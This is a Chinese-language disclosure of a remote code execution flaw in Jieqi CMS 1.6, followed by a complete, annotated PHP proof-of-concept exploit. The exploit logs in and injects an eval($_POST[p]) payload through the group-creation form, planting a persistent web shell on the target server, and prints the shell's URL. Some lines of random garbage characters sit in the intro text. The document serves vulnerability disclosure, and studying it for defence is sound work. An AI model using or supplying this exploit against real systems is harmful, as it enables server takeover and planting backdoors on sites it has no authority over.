杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
4 f3 e' k1 [- W5 j5 Z" S6 }0 U+ b" C- {& b8 t6 ?3 I& g6 p
该系统存在多个远程安全漏洞。本文报告的是 1.6 版本的一个远程代码执行漏洞：通过“创建圈子”表单把 PHP 代码注入到 CMS 生成的 PHP 文件中，从而在服务器上执行任意代码。该漏洞据我们所知已存在两年多。
利用前提：需要一个已登录、且有权创建圈子的用户账号（即此漏洞是“认证后”的远程代码执行，而非匿名可利用）。
* [7 Z5 }0 w3 E& h7 y
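<?php
/*
 * Jieqi CMS V1.6 PHP code injection exploit (proof of concept)
 * by flyh4t — mail: phpsec at hotmail dot com — team: http://www.wolvez.org
 *
 * What the PoC does (each step is visible below):
 *   1. POST the supplied credentials to login.php and keep the session cookie.
 *   2. POST a multipart "create group" form to modules/group/create.php whose
 *      "gname" field carries a PHP payload. The CMS writes the group name into
 *      a PHP file under files/group/userdir/, so the payload closes the string
 *      literal it lands in and appends eval($_POST[p]).
 *   3. Pick the new group id (g=<id>) out of the response and print the URL of
 *      the written file; POSTing a parameter "p" to it executes PHP.
 *
 * Preconditions / caveats for the practitioner:
 *   - An account that is allowed to create a group is required (this is an
 *     authenticated RCE, not an anonymous one).
 *   - The PoC does not verify that the login succeeded; a wrong password or a
 *     user without group-creation rights shows up only as a missing group id.
 *   - The written info.php is a persistent backdoor on the target. Only run
 *     this against systems you are authorised to test, and remove the file
 *     (and the created group) afterwards.
 *   - Needs the curl extension; otherwise works regardless of php.ini settings.
 */

echo '
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
';

// The original usage text listed only three arguments although four are
// required (and checked); the password is now documented as well.
if ($argc < 5) {
    echo '
+---------------------------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path username password
host:     target server (ip/hostname)
path:     path to jieqicms
username: a username who can create group
password: that user\'s password
Example:
php ' . $argv[0] . ' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
';
    exit(1);
}

/**
 * Build the base URL of the installation without a trailing slash, so that
 * "/jieqicmsv1.6/", "jieqicmsv1.6" and "" all produce a clean URL instead of
 * the "http://host//path//login.php" the original string concatenation gave.
 */
function jq_base_url($host, $path)
{
    $base = 'http://' . $host . '/' . trim($path, '/');
    return rtrim($base, '/');
}

/**
 * Encode $fields as a multipart/form-data body delimited by $boundary.
 * Uses CRLF line endings as RFC 2046 requires; the original PoC relied on the
 * bare LF of the source file, which PHP's parser tolerates but other front
 * ends may not. The boundary passed here is the bare value from the
 * Content-Type header; the "--" prefix is added per delimiter.
 */
function jq_multipart_body(array $fields, $boundary)
{
    $body = '';
    foreach ($fields as $name => $value) {
        $body .= '--' . $boundary . "\r\n"
               . 'Content-Disposition: form-data; name="' . $name . '"' . "\r\n\r\n"
               . $value . "\r\n";
    }
    return $body . '--' . $boundary . "--\r\n";
}

/**
 * POST $body to $url and return the response body as a string.
 *
 * The cookie jar is both read and written, so the session set by login.php is
 * replayed on the next request. On a transport error the cURL message is
 * written to STDERR and the script exits non-zero (the original printed
 * curl_error($ch) on an undefined $ch and exited with status 0).
 */
function jq_post($url, $body, array $headers, $cookieJar)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieJar);
    // Return the body instead of echoing it, so no ob_start()/ob_clean() games.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    $resp = curl_exec($ch);
    if ($resp === false) {
        $err = curl_error($ch);
        curl_close($ch);
        fwrite(STDERR, 'cURL Error: ' . $err . "\n");
        fwrite(STDERR, "exploit failed\n");
        exit(1);
    }
    curl_close($ch);
    return $resp;
}

// Same mask as the original error_reporting(7), spelled out.
error_reporting(E_ERROR | E_WARNING | E_PARSE);
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

$base = jq_base_url($host, $path);

// The session cookie goes to a private temp file instead of ./cookie.txt and
// is deleted at the end, so a valid session token is not left in the CWD.
$cookieJar = tempnam(sys_get_temp_dir(), 'jieqi');

/* step 1: log in and obtain the session cookie */
// Credentials are URL-encoded (the original interpolated them raw, so a
// password containing '&' or '=' broke the form). The "submit" value is the
// GBK/URL-encoded "&#160;登&#160;&#160;录&#160;" button label the login form
// sends; it is reproduced verbatim.
$login = 'password=' . urlencode($password)
       . '&username=' . urlencode($username)
       . '&usecookie=86400'
       . '&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B'
       . '&action=login&jumpreferer=1';
jq_post($base . '/login.php', $login, array(), $cookieJar);

/* step 2: create a group whose name carries the PHP payload */
// "';" closes the single-quoted string the CMS writes the group name into,
// then eval($_POST[p]) turns the generated file into a one-line shell and
// "//" comments out the rest of that line. The payload text is the original's.
$payload  = "';" . 'eval($_POST[p]);//flyh4t';
$boundary = '---------------------------23281168279961';
$form = jq_multipart_body(array(
    'gname'  => $payload,
    'gcatid' => '1',
    'gaudit' => '1',
    'gbrief' => '1',
), $boundary);
$resp = jq_post(
    $base . '/modules/group/create.php',
    $form,
    array('Content-Type: multipart/form-data; boundary=' . $boundary),
    $cookieJar
);

if (is_file($cookieJar)) {
    unlink($cookieJar);
}

/* step 3: locate the written file */
// create.php answers with a link carrying the new group id as g=<id>. The
// original indexed $shell[1] without checking the match, which on failure
// (bad login, no group permission) printed a URL with an empty id.
if (!preg_match('/g=([0-9]+)/', $resp, $m)) {
    fwrite(STDERR, "no group id found in the response: login failed or the user cannot create groups?\n");
    exit(1);
}
$groupId = $m[1];

// The "userdir/0/" component is reproduced from the original PoC; presumably a
// storage bucket the CMS derives from the id — confirm against the target.
$url = $base . '/files/group/userdir/0/' . $groupId . '/info.php';
echo "view your shell here (POST parameter: p)\r\n";
echo $url . "\n";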